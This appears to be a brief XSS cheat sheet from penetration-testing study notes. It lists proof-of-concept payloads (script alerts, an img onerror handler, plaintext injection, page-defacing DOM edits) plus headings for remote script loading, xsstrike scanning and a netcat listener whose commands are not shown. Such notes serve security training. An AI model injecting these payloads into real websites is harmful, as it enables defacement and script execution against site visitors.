githubEdit

XSS

Basic Payloads

Basic alert XSS

<script>alert(window.origin)</script>

Plaintext injection

<plaintext>

Basic print execution

<script>print()</script>

HTML-based alert XSS

<img src="" onerror=alert(window.origin)>

DOM Manipulation

Change background color

<script>document.body.style.background = "#141d2b"</script>

Change background image

<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>

Change website title

Overwrite website's main body

Remove specific HTML element

Advanced Payloads

Load remote script


Common Commands

Scanning and Exploitation

Run xsstrike on a URL parameter

Networking

Start netcat listener

Start PHP server

Last updated